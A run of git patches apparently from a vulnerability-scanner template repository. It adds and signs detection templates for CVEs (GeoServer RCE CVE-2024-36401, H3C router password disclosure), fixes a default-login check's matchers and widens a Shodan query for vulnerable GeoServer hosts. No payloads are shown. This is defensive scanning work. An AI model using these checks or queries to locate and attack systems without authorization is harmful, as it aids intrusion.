http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8884,7 +8885,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:44107720d023cae03c471785fdd3645850f59330 +templates-checksum.txt:9f1d7692737ebf3f118b44e07f30f20b1b465c78 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 1c42578929b9b8a5f95331925c8adf28d93ba851 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 16 Jul 2024 08:37:01 +0000 Subject: [PATCH 1294/1841] Auto Generated New Template Addition List [Tue Jul 16 08:37:01 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 3ac6711252..6bc6177287 100644 --- a/.new-additions +++ b/.new-additions @@ -10,6 +10,7 @@ http/cves/2024/CVE-2024-3742.yaml http/cves/2024/CVE-2024-4257.yaml http/cves/2024/CVE-2024-4879.yaml http/cves/2024/CVE-2024-5217.yaml +http/cves/2024/CVE-2024-6289.yaml http/exposed-panels/falcosidekick-panel.yaml http/exposed-panels/gradle/gradle-develocity-panel.yaml http/exposures/configs/apache-ozone-conf.yaml From ef4213d6382a4b1883de736b7df8c0ff4ea6524e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 16 Jul 2024 08:37:12 +0000 Subject: [PATCH 1295/1841] Auto Generated Templates Checksum [Tue Jul 16 08:37:12 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 7bf58fe294..eda8ea2a51 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3507,6 +3507,7 @@ http/cves/2024/CVE-2024-5522.yaml:1aae46b20c03316823691aa8755eb8e35b46533a http/cves/2024/CVE-2024-5947.yaml:1007c228fb459bf995a9b759b10c668e190ab1e6 http/cves/2024/CVE-2024-6028.yaml:5bb353f3acbac441334cb7219e4198515178e991 http/cves/2024/CVE-2024-6188.yaml:dc4f78116668d20ee580f223cdf67a19cd0c6f26 +http/cves/2024/CVE-2024-6289.yaml:299fe09be2509d72d2233eabd1a1103466a83138 http/default-logins/3com/3Com-wireless-default-login.yaml:80e8ff28f6fe58cd692d51a649e382978ba730c3 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce http/default-logins/3ware-default-login.yaml:c4ee7d8f55d3a9a6e674b4706b87321bbf25cfda @@ -8885,7 +8886,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:9f1d7692737ebf3f118b44e07f30f20b1b465c78 +templates-checksum.txt:af4603ad67cb4b85d5ef3af32e3f060b4225a318 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 6d1bc57c14504cdeb12d6643a4cc16cb582ab21a Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 16 Jul 2024 08:37:21 +0000 Subject: [PATCH 1296/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 97b66ddad4..bec11a1195 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -12,6 +12,7 @@ on: - 'http/cves/2024/CVE-2024-1512.yaml' - 'http/cves/2024/CVE-2024-2330.yaml' - 'http/cves/2024/CVE-2024-3742.yaml' + - 'http/cves/2024/CVE-2024-4257.yaml' - 'http/cves/2024/CVE-2024-4879.yaml' - 'http/cves/2024/CVE-2024-5217.yaml' - 'http/exposed-panels/falcosidekick-panel.yaml' From e4196343d3f516d12589b2f8fa65b8fee98a0744 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 16 Jul 2024 08:37:54 +0000 Subject: [PATCH 1297/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index bec11a1195..9bf0036164 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -15,6 +15,7 @@ on: - 'http/cves/2024/CVE-2024-4257.yaml' - 'http/cves/2024/CVE-2024-4879.yaml' - 'http/cves/2024/CVE-2024-5217.yaml' + - 'http/cves/2024/CVE-2024-6289.yaml' - 'http/exposed-panels/falcosidekick-panel.yaml' - 'http/exposed-panels/gradle/gradle-develocity-panel.yaml' - 'http/exposures/configs/apache-ozone-conf.yaml' From 30ee3cc88cfde9c4ed210e6f90d62862f1320143 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 16 Jul 2024 08:38:08 +0000 Subject: [PATCH 1298/1841] Auto Template Signing [Tue Jul 16 08:38:08 UTC 2024] :robot: --- http/cves/2024/CVE-2024-4257.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-4257.yaml b/http/cves/2024/CVE-2024-4257.yaml index 403b4f0e95..8864160a83 100644 --- a/http/cves/2024/CVE-2024-4257.yaml +++ b/http/cves/2024/CVE-2024-4257.yaml @@ -53,3 +53,4 @@ http: - 'contains(header,"text/html")' - 'status_code == 200' condition: and +# digest: 4a0a004730450221009f507c513c2400f07210853641979f030dd0c78036feca368942620bdc05ce5e02202911bb97e297e16a4863039b4bb37015179a3edd7c36831e74157f6ff0130cd8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 8149f7823e8feb4103f552ad235a3de902bdba52 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 16 Jul 2024 08:40:47 +0000 Subject: [PATCH 1299/1841] Auto Generated New Template Addition List [Tue Jul 16 08:40:47 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 6bc6177287..660a17e54c 100644 --- a/.new-additions +++ b/.new-additions @@ -6,6 +6,7 @@ http/cves/2023/CVE-2023-4450.yaml http/cves/2023/CVE-2023-48728.yaml http/cves/2024/CVE-2024-1512.yaml http/cves/2024/CVE-2024-2330.yaml +http/cves/2024/CVE-2024-34351.yaml http/cves/2024/CVE-2024-3742.yaml http/cves/2024/CVE-2024-4257.yaml http/cves/2024/CVE-2024-4879.yaml From 23bcfbd03666215ff37877ebeb459b9568509813 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 16 Jul 2024 08:40:54 +0000 Subject: [PATCH 1300/1841] Auto Generated Templates Checksum [Tue Jul 16 08:40:54 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index eda8ea2a51..fa34f92655 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3474,6 +3474,7 @@ http/cves/2024/CVE-2024-33610.yaml:24618eb8295fd20c2eaafe525e895edb63a1c04c http/cves/2024/CVE-2024-33724.yaml:fc5b67f9b84cdf5d6d592f2238c1fb0ef08592cc http/cves/2024/CVE-2024-3400.yaml:446beaf529f998b8b0c5957b75870f5198c21ff2 http/cves/2024/CVE-2024-34102.yaml:2152d70ae35f98d6968fad641af063bdd7b8f83b +http/cves/2024/CVE-2024-34351.yaml:538c16df5562ee928dbf6ac41aee3bda4ecaf6d5 http/cves/2024/CVE-2024-34470.yaml:9e15fe4d83b7f511f9e363252311ce0fca2208d8 http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 http/cves/2024/CVE-2024-34982.yaml:68453463b4c080e16f4b23e4bcf22565276f0e20 @@ -3491,7 +3492,7 @@ http/cves/2024/CVE-2024-37881.yaml:060af3bf51e4ab05684d4923658d02b3c49583bb http/cves/2024/CVE-2024-3822.yaml:2dd9c56b09c0619afb49b80cbcb5979b3eae5a1c http/cves/2024/CVE-2024-3922.yaml:768a5cb24e6893fee27193eda765eeeaedae2a21 http/cves/2024/CVE-2024-4040.yaml:87622a19f81053e7b7bfdf1fdce706db759cc310 -http/cves/2024/CVE-2024-4257.yaml:8876e33e746a9fd57af6a76fcac1c71ff3f00c4f +http/cves/2024/CVE-2024-4257.yaml:76768a186c284a20129bc8f67a2c620f8c1fc7ac http/cves/2024/CVE-2024-4348.yaml:4b01ceded94fa6f15d3037f21c83953c37fef181 http/cves/2024/CVE-2024-4358.yaml:9c130ef94d82e026679e80b4fcd1d544991528e8 http/cves/2024/CVE-2024-4434.yaml:832631bb51317578dff7d1f78cc15a33ffe9c00a @@ -8886,7 +8887,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:af4603ad67cb4b85d5ef3af32e3f060b4225a318 +templates-checksum.txt:b8d3d41c80b63f06b42a2ee2956eded98bc66765 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From ae44709fb62535ab41844ef76716071ef777743b Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 16 Jul 2024 08:41:41 +0000 Subject: [PATCH 1301/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 9bf0036164..e7cfe20f9b 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -11,6 +11,7 @@ on: - 'http/cves/2023/CVE-2023-48728.yaml' - 'http/cves/2024/CVE-2024-1512.yaml' - 'http/cves/2024/CVE-2024-2330.yaml' + - 'http/cves/2024/CVE-2024-34351.yaml' - 'http/cves/2024/CVE-2024-3742.yaml' - 'http/cves/2024/CVE-2024-4257.yaml' - 'http/cves/2024/CVE-2024-4879.yaml' From 2603fc95da3ed5f3fd8f5e57e64d23bcba08099b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 16 Jul 2024 08:42:34 +0000 Subject: [PATCH 1302/1841] Auto Template Signing [Tue Jul 16 08:42:34 UTC 2024] :robot: --- http/cves/2024/CVE-2024-34351.yaml | 1 + http/cves/2024/CVE-2024-6289.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/cves/2024/CVE-2024-34351.yaml b/http/cves/2024/CVE-2024-34351.yaml index b0bc3df145..7b9c229660 100644 --- a/http/cves/2024/CVE-2024-34351.yaml +++ b/http/cves/2024/CVE-2024-34351.yaml @@ -47,3 +47,4 @@ http: part: body words: - "The requested resource isn't a valid image" +# digest: 4a0a0047304502201cb22b31416f184c4beeafb402db2f170f661e1cb990d6fd5ab034d847bfa51c022100fdeb601572c1a7b843247ef5294a0243a39df1a90310dcb0fc97a3edd48bde6f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-6289.yaml b/http/cves/2024/CVE-2024-6289.yaml index fb0df7815e..4e440bdd9e 100644 --- a/http/cves/2024/CVE-2024-6289.yaml +++ b/http/cves/2024/CVE-2024-6289.yaml @@ -58,3 +58,4 @@ http: - type: kval kval: - location +# digest: 4a0a00473045022020d4b2a669248c99076dbae2a47bd27614ff41baa828ef6b8f09219e7f5804c10221008cea48e05a376902a9024b466cdcb72992fa8239336fc3085e7ba319e6627de7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 0adba0d3f1469ee8411595be1fbf4ffc5b9c91ad Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 16 Jul 2024 14:33:12 +0530 Subject: [PATCH 1303/1841] Fix FP apisix-default-login.yaml --- .../apache/apisix-default-login.yaml | 22 ++++++++++++------- 1 file changed, 14 insertions(+), 8 deletions(-) diff --git a/http/default-logins/apache/apisix-default-login.yaml b/http/default-logins/apache/apisix-default-login.yaml index 87b1b252e0..ddbff16125 100644 --- a/http/default-logins/apache/apisix-default-login.yaml +++ b/http/default-logins/apache/apisix-default-login.yaml @@ -1,7 +1,7 @@ id: apisix-default-login info: - name: Apache Apisix Default Admin Login + name: Apache Apisix Admin - Default Login author: pdteam severity: high description: An Apache Apisix default admin login was discovered. @@ -38,15 +38,21 @@ http: matchers-condition: and matchers: + - type: word + part: body + words: + - '"data":' + - '"token":' + - '{"code":0' + condition: and + + - type: word + part: header + words: + - 'application/json' + - type: status status: - 200 - - type: word - words: - - '"data"' - - '"token"' - - '"code":0' - condition: and - # digest: 4a0a00473045022100ed7246599d057edeb05c9cbb8f8e6e646ecd8f30c16f824b8fcd3fdb7fc0a4700220730ebc8209a21fced7ba192032e7731959b3eb50f22441f85ac5b3ef82e97e48:922c64590222798bb761d5b6d8e72950 From 62ee582055f32aff2272b790511eee4cc2e63a87 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 16 Jul 2024 09:06:49 +0000 Subject: [PATCH 1305/1841] Auto Generated Templates Checksum [Tue Jul 16 09:06:49 UTC 2024] :robot: --- templates-checksum.txt | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index fa34f92655..cf794f8e9d 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3474,7 +3474,7 @@ http/cves/2024/CVE-2024-33610.yaml:24618eb8295fd20c2eaafe525e895edb63a1c04c http/cves/2024/CVE-2024-33724.yaml:fc5b67f9b84cdf5d6d592f2238c1fb0ef08592cc http/cves/2024/CVE-2024-3400.yaml:446beaf529f998b8b0c5957b75870f5198c21ff2 http/cves/2024/CVE-2024-34102.yaml:2152d70ae35f98d6968fad641af063bdd7b8f83b -http/cves/2024/CVE-2024-34351.yaml:538c16df5562ee928dbf6ac41aee3bda4ecaf6d5 +http/cves/2024/CVE-2024-34351.yaml:0b871adb6b9e887987000e89999f1de41647ddcb http/cves/2024/CVE-2024-34470.yaml:9e15fe4d83b7f511f9e363252311ce0fca2208d8 http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 http/cves/2024/CVE-2024-34982.yaml:68453463b4c080e16f4b23e4bcf22565276f0e20 @@ -3508,7 +3508,7 @@ http/cves/2024/CVE-2024-5522.yaml:1aae46b20c03316823691aa8755eb8e35b46533a http/cves/2024/CVE-2024-5947.yaml:1007c228fb459bf995a9b759b10c668e190ab1e6 http/cves/2024/CVE-2024-6028.yaml:5bb353f3acbac441334cb7219e4198515178e991 http/cves/2024/CVE-2024-6188.yaml:dc4f78116668d20ee580f223cdf67a19cd0c6f26 -http/cves/2024/CVE-2024-6289.yaml:299fe09be2509d72d2233eabd1a1103466a83138 +http/cves/2024/CVE-2024-6289.yaml:83d044a4385a60a024a6dee9f02644f4db94a4b7 http/default-logins/3com/3Com-wireless-default-login.yaml:80e8ff28f6fe58cd692d51a649e382978ba730c3 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce http/default-logins/3ware-default-login.yaml:c4ee7d8f55d3a9a6e674b4706b87321bbf25cfda @@ -3525,7 +3525,7 @@ http/default-logins/ambari/ambari-default-login.yaml:c7f2072fb639a02e718d877dcc7 http/default-logins/ampjuke-default-login.yaml:80f58e7f436f698938228565a8b02626e5c287ca http/default-logins/apache/airflow-default-login.yaml:f4a72dcfe661dbfb227717d3201877b185af4d7b http/default-logins/apache/apache-apollo-default-login.yaml:c20802affb7034ce37d2508c867a48010bf59ded -http/default-logins/apache/apisix-default-login.yaml:88d0d5d11425c2cadb204d0afb7b26d8df4376fe +http/default-logins/apache/apisix-default-login.yaml:b46d26d2b69aa5e013a6c9617af3a82c5c195f6c http/default-logins/apache/dolphinscheduler-default-login.yaml:1e4031c994ea6c6aa571dad9a5e7ccbf908e2251 http/default-logins/apache/dubbo-admin-default-login.yaml:1e96758e87c9540e0f40a4eaa04518a23f64eb28 http/default-logins/apache/kafka-center-default-login.yaml:19e5b0334aff53ce7251a89f2ee445228f91c0b9 @@ -8887,7 +8887,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:b8d3d41c80b63f06b42a2ee2956eded98bc66765 +templates-checksum.txt:d328ba36b0261d73bb9550abba786ef4147479d7 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 905b914f7c1a0aa4349c7ec08eafd6eec77c3001 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 16 Jul 2024 09:08:33 +0000 Subject: [PATCH 1306/1841] Auto Template Signing [Tue Jul 16 09:08:33 UTC 2024] :robot: --- http/default-logins/apache/apisix-default-login.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/http/default-logins/apache/apisix-default-login.yaml b/http/default-logins/apache/apisix-default-login.yaml index ddbff16125..ffb39618f4 100644 --- a/http/default-logins/apache/apisix-default-login.yaml +++ b/http/default-logins/apache/apisix-default-login.yaml @@ -54,5 +54,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100ed7246599d057edeb05c9cbb8f8e6e646ecd8f30c16f824b8fcd3fdb7fc0a4700220730ebc8209a21fced7ba192032e7731959b3eb50f22441f85ac5b3ef82e97e48:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100904a6cca0b88acfef25bc3631d6264acc7fc2297ecae777797da759411611594022077788cb7ea9b625030ddeec91ed24ff33121a3abf0f32d5463bed4c430ff5b7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 7d7ab858b2b3b0048f5e07c6f60279c337bf5a17 Mon Sep 17 00:00:00 2001 From: Ryan Borum <37112354+ryanborum@users.noreply.github.com> Date: Tue, 16 Jul 2024 08:04:14 -0400 Subject: [PATCH 1307/1841] Improved shodan query for CVE-2024-36401.yaml Returns ~50k accurate results compared to ~900 before. Source: https://www.vicarius.io/vsociety/posts/geoserver-rce-cve-2024-36401 --- http/cves/2024/CVE-2024-36401.yaml | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/http/cves/2024/CVE-2024-36401.yaml b/http/cves/2024/CVE-2024-36401.yaml index eb40bc63a5..0d68613ef4 100644 --- a/http/cves/2024/CVE-2024-36401.yaml +++ b/http/cves/2024/CVE-2024-36401.yaml @@ -2,7 +2,9 @@ id: CVE-2024-36401 info: name: GeoServer RCE in Evaluating Property Name Expressions - author: DhiyaneshDk + author: + - DhiyaneshDk + - GarysMortalEnemy severity: critical description: | In the GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions. @@ -18,7 +20,7 @@ info: max-request: 1 vendor: osgeo product: geoserver - shodan-query: http.title:"geoserver" + shodan-query: Server: GeoHttpServer fofa-query: - title="geoserver" - app="geoserver" @@ -65,4 +67,4 @@ http: part: content_type words: - "application/xml" -# digest: 4a0a004730450220735fae2d600334ad0b407f6e2a0905a071226561197d52236f48b8065ee38fa4022100c16a9085e40790dda9b6217e62a1d5fc3d0d68d7443cf10582b55cece0c2e632:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220735fae2d600334ad0b407f6e2a0905a071226561197d52236f48b8065ee38fa4022100c16a9085e40790dda9b6217e62a1d5fc3d0d68d7443cf10582b55cece0c2e632:922c64590222798bb761d5b6d8e72950 From 6b5e3f8a7c2cec96b6253edc9a231e7e1d04aa8e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 16 Jul 2024 17:38:49 +0530 Subject: [PATCH 1308/1841] minor-update --- http/cves/2024/CVE-2024-36401.yaml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/http/cves/2024/CVE-2024-36401.yaml b/http/cves/2024/CVE-2024-36401.yaml index 0d68613ef4..fea023de05 100644 --- a/http/cves/2024/CVE-2024-36401.yaml +++ b/http/cves/2024/CVE-2024-36401.yaml @@ -2,9 +2,7 @@ id: CVE-2024-36401 info: name: GeoServer RCE in Evaluating Property Name Expressions - author: - - DhiyaneshDk - - GarysMortalEnemy + author: DhiyaneshDk severity: critical description: | In the GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions. From 4651d77e9c233945426e16dd4da7179f4680016d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 16 Jul 2024 17:42:48 +0530 Subject: [PATCH 1309/1841] fix-lint --- http/cves/2024/CVE-2024-36401.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-36401.yaml b/http/cves/2024/CVE-2024-36401.yaml index fea023de05..eb0361468d 100644 --- a/http/cves/2024/CVE-2024-36401.yaml +++ b/http/cves/2024/CVE-2024-36401.yaml @@ -18,7 +18,7 @@ info: max-request: 1 vendor: osgeo product: geoserver - shodan-query: Server: GeoHttpServer + shodan-query: "Server: GeoHttpServer" fofa-query: - title="geoserver" - app="geoserver" From 2db502e313c43db7c0c0a558bb7afeedefeda739 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 16 Jul 2024 17:46:41 +0530 Subject: [PATCH 1310/1841] add author name --- http/cves/2024/CVE-2024-36401.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-36401.yaml b/http/cves/2024/CVE-2024-36401.yaml index eb0361468d..358bd229f9 100644 --- a/http/cves/2024/CVE-2024-36401.yaml +++ b/http/cves/2024/CVE-2024-36401.yaml @@ -2,7 +2,7 @@ id: CVE-2024-36401 info: name: GeoServer RCE in Evaluating Property Name Expressions - author: DhiyaneshDk + author: DhiyaneshDk,ryanborum severity: critical description: | In the GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions. From b11d25de6d3cb991c8062b9098db3e9d36275c40 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 16 Jul 2024 12:35:56 +0000 Subject: [PATCH 1312/1841] Auto Generated Templates Checksum [Tue Jul 16 12:35:56 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index cf794f8e9d..d1ccdd58d0 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3479,7 +3479,7 @@ http/cves/2024/CVE-2024-34470.yaml:9e15fe4d83b7f511f9e363252311ce0fca2208d8 http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 http/cves/2024/CVE-2024-34982.yaml:68453463b4c080e16f4b23e4bcf22565276f0e20 http/cves/2024/CVE-2024-3552.yaml:0994d94f6f8b7ea5f3774e6b4fbc542a57369f6e -http/cves/2024/CVE-2024-36401.yaml:ee5f88dccf1d4ffbb38cfea089a1a650527451ce +http/cves/2024/CVE-2024-36401.yaml:772f40c37a1b1da253f91f61412f6d74b85d2a70 http/cves/2024/CVE-2024-36412.yaml:3dab338da4cd060aacc90a2c21159bf56c95bdff http/cves/2024/CVE-2024-36527.yaml:eb2651a0ee32128fdfe8ae24c72f5d61a1a7f68e http/cves/2024/CVE-2024-36837.yaml:65450880230a57a47c4dbf8b268af022ab009189 @@ -3525,7 +3525,7 @@ http/default-logins/ambari/ambari-default-login.yaml:c7f2072fb639a02e718d877dcc7 http/default-logins/ampjuke-default-login.yaml:80f58e7f436f698938228565a8b02626e5c287ca http/default-logins/apache/airflow-default-login.yaml:f4a72dcfe661dbfb227717d3201877b185af4d7b http/default-logins/apache/apache-apollo-default-login.yaml:c20802affb7034ce37d2508c867a48010bf59ded -http/default-logins/apache/apisix-default-login.yaml:b46d26d2b69aa5e013a6c9617af3a82c5c195f6c +http/default-logins/apache/apisix-default-login.yaml:923474076782f3ec9cd94c92eba47769c020df70 http/default-logins/apache/dolphinscheduler-default-login.yaml:1e4031c994ea6c6aa571dad9a5e7ccbf908e2251 http/default-logins/apache/dubbo-admin-default-login.yaml:1e96758e87c9540e0f40a4eaa04518a23f64eb28 http/default-logins/apache/kafka-center-default-login.yaml:19e5b0334aff53ce7251a89f2ee445228f91c0b9 @@ -8887,7 +8887,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:d328ba36b0261d73bb9550abba786ef4147479d7 +templates-checksum.txt:536fcf1951bbd1a468afef8485f8c2cd8d3dd2fa wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From d5345f8a7f8128e50185551b62df983e7d081cb8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 16 Jul 2024 12:37:33 +0000 Subject: [PATCH 1313/1841] Auto Template Signing [Tue Jul 16 12:37:33 UTC 2024] :robot: --- http/cves/2024/CVE-2024-36401.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-36401.yaml b/http/cves/2024/CVE-2024-36401.yaml index 358bd229f9..6b13ce3582 100644 --- a/http/cves/2024/CVE-2024-36401.yaml +++ b/http/cves/2024/CVE-2024-36401.yaml @@ -65,4 +65,4 @@ http: part: content_type words: - "application/xml" -# digest: 4a0a004730450220735fae2d600334ad0b407f6e2a0905a071226561197d52236f48b8065ee38fa4022100c16a9085e40790dda9b6217e62a1d5fc3d0d68d7443cf10582b55cece0c2e632:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022050a925671a91913f98317b73a4f3cda362d8a355507459097e4288b9a30eb0b8022100ce59a57d605ac794ee5929feec3cb4238e33483384b7735a20fdce903db76366:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 0d4930f6f9322da4e250fae34bd72ca8163b8726 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Wed, 17 Jul 2024 02:14:03 +0300 Subject: [PATCH 1314/1841] add CVE-2024-32238 --- http/cves/2024/CVE-2024-32238.yaml | 56 ++++++++++++++++++++++++++++++ 1 file changed, 56 insertions(+) create mode 100644 http/cves/2024/CVE-2024-32238.yaml diff --git a/http/cves/2024/CVE-2024-32238.yaml b/http/cves/2024/CVE-2024-32238.yaml new file mode 100644 index 0000000000..34200bda34 --- /dev/null +++ b/http/cves/2024/CVE-2024-32238.yaml @@ -0,0 +1,56 @@ +id: CVE-2024-32238 + +info: + name: H3C ER8300G2-X - Password Disclosure + author: securityforeveryone + severity: critical + description: | + H3C ER8300G2-X is vulnerable to Incorrect Access Control. The password for the router's management system can be accessed via the management system page login interface. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-32238 + - https://cvefeed.io/vuln/detail/CVE-2024-32238 + - https://github.com/asdfjkl11/CVE-2024-32238/issues/1 + - https://www.h3c.com/cn/Products_And_Solution/InterConnect/Products/Routers/Products/Enterprise/ER/ER8300G2-X/ + - https://github.com/FuBoLuSec/CVE-2024-32238 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-32238 + cwe-id: CWE-522 + epss-score: 0.00043 + 